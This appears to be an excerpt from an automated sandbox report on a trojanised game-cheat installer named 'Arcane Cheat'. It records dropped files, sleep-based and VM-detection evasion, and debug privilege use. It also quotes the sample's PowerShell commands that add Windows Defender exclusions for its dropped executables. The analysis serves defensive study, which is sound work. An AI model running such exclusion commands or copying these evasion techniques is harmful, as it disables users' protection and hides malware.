            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\msvcr120.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-M8DR9.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\msvcr100.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jfxmedia.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\resource.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\kcms.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-1D9V4.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-TJN2U.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RKJ6P.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\ssv.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\plugin2\is-OVE01.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-6EJKR.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-H7O6N.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\prism_d3d.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\rmid.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\dtplugin\is-7TEQQ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-8GHN8.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-GFQTQ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jp2launcher.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FDP9A.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\t2k.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\plugin2\msvcr100.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RPV0O.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\npt.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\dtplugin\npdeployJava1.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\plugin2\is-1RSEV.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-069DQ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-KFFNG.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\javafx_font_t2k.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\unins000.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-3TU72.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-NE044.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FA3UT.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-7LLC2.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\ssvagent.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jp2iexp.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-90393.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-O1CKK.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\deploy.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jp2ssv.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\dtplugin\deployJava1.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\servertool.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-2KSRS.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\java_crw_demo.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jsound.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\dt_shmem.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-MV7G1.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\unpack200.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-F27BH.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\rmiregistry.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-11A56.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RBKCS.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\JavaAccessBridge-32.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RMB9M.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\fxplugins.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jjs.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\Arcane Cheat.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\JavaAccessBridge.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-4UUQJ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-T1J1I.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\jli.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-162RA.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-FF2ON.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-CSEKM.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\is-PFI2B.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-N4812.tmp\_isetup\_shfoldr.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\is-5H46A.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\is-8NKS2.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Arcane Cheat\jre\bin\javafx_iio.dll (copy)Jump to dropped file
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe TID: 2180Thread sleep count: 1195 > 30Jump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe TID: 2180Thread sleep count: 997 > 30Jump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe TID: 6268Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe TID: 4904Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\addins\audiodg.exe TID: 5164Thread sleep count: 304 > 30
            Source: C:\Windows\addins\audiodg.exe TID: 8548Thread sleep count: 367 > 30
            Source: C:\Windows\addins\audiodg.exe TID: 7240Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Recovery\explorer.exe TID: 2500Thread sleep count: 365 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep count: 1750 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8360Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8260Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep count: 1810 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8252Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Recovery\explorer.exe TID: 3372Thread sleep count: 367 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944Thread sleep count: 1788 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8344Thread sleep time: -12912720851596678s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8228Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8116Thread sleep count: 1967 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8348Thread sleep time: -12912720851596678s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8144Thread sleep count: 1804 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8356Thread sleep time: -10145709240540247s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\addins\audiodg.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\addins\audiodg.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Recovery\explorer.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Recovery\explorer.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0082A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,3_2_0082A5F4
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0083B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,3_2_0083B8E0
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0083DD72 VirtualQuery,GetSystemInfo,3_2_0083DD72
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\addins\audiodg.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: browserwinsvc.exe, 00000007.00000002.1948355180.000000001C2F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}AutoItXxJ
            Source: browserwinsvc.exe, 00000007.00000002.1947183113.000000001C24D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\?
            Source: is-KHA4M.tmp.2.drBinary or memory string: java/lang/VirtualMachineError
            Source: is-KHA4M.tmp.2.drBinary or memory string: Unable to link/verify VirtualMachineError class
            Source: wscript.exe, 00000004.00000003.1746564462.0000000003066000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: browserwinsvc.exe, 00000007.00000002.1948011318.000000001C2DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\7K
            Source: browserwinsvc.exe, 00000007.00000002.1947897628.000000001C2C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}KH
            Source: is-KHA4M.tmp.2.drBinary or memory string: m{constant pool}code cache C-heap hand metaspace chunks dict zone strs syms heap threads [Verifying Genesis-2147483648Unable to link/verify Finalizer.register methodUnable to link/verify ClassLoader.addClass methodProtectionDomain.impliesCreateAccessControlContext() has the wrong linkageUnable to link/verify Unsafe.throwIllegalAccessError methodJava heap space: failed reallocation of scalar replaced objectsGC overhead limit exceededRequested array size exceeds VM limitCompressed class spaceJava heap spaceUnable to link/verify VirtualMachineError classC:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\hotspot\src\share\vm\oops\arrayKlass.cpp[]guarantee(component_mirror()->klass() != NULL) failedshould have a classC:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\hotspot\src\share\vm\gc_interface/collectedHeap.inline.hpp - length: %dguarantee(a->length() >= 0) failedarray with negative length?guarantee(obj->is_array()) failedmust be arrayshould be klassguarantee(is_constantPool()) failedvtable restored by this call<pseudo-string> cache=0x%08x (extra) for /operands[%d]/preresolutionconstant pool [%d]A constant pool lockC:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\hotspot\src\share\vm\oops\constantPool.cppguarantee(!ConstantPool::is_invokedynamic_index(which)) failedan invokedynamic instruction does not have a klassRESOLVE %s %s
            Source: browserwinsvc.exe, 00000007.00000002.1947183113.000000001C24D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: uChcvn3L6R.exe, 00000000.00000003.1725594185.0000000004FEE000.00000004.00000020.00020000.00000000.sdmp, Arcane Cheat.exe, 00000003.00000003.1728515342.000000000741F000.00000004.00000020.00020000.00000000.sdmp, Arcane Cheat.exe, 00000003.00000003.1727874706.00000000072F2000.00000004.00000020.00020000.00000000.sdmp, Arcane Cheat.exe, 00000003.00000003.1726951934.00000000069E7000.00000004.00000020.00020000.00000000.sdmp, browserwinsvc.exe, 00000007.00000000.1747946280.0000000000572000.00000002.00000001.01000000.0000000E.sdmp, RuntimeBroker.exe.7.drBinary or memory string: tHGfSGePnSN5loNOcfS
            Source: is-KHA4M.tmp.2.drBinary or memory string: _well_known_klasses[SystemDictionary::VirtualMachineError_klass_knum]
            Source: browserwinsvc.exe, 00000007.00000002.1943088220.000000001BA26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeAPI call chain: ExitProcess graph end nodegraph_3-23596
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0084866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0084866F
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0084753D mov eax, dword ptr fs:[00000030h]3_2_0084753D
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0084B710 GetProcessHeap,3_2_0084B710
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\addins\audiodg.exeProcess token adjusted: Debug
            Source: C:\Windows\addins\audiodg.exeProcess token adjusted: Debug
            Source: C:\Recovery\explorer.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Recovery\explorer.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0083F063 SetUnhandledExceptionFilter,3_2_0083F063
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0083F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0083F22B
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0084866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0084866F
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0083EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0083EF05
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe'
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\addins\audiodg.exe'
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\qiOZcVoixJLcuAFKAnRd.exe'
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\qiOZcVoixJLcuAFKAnRd.exe'
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'Jump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\addins\audiodg.exe'Jump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\qiOZcVoixJLcuAFKAnRd.exe'Jump to behavior
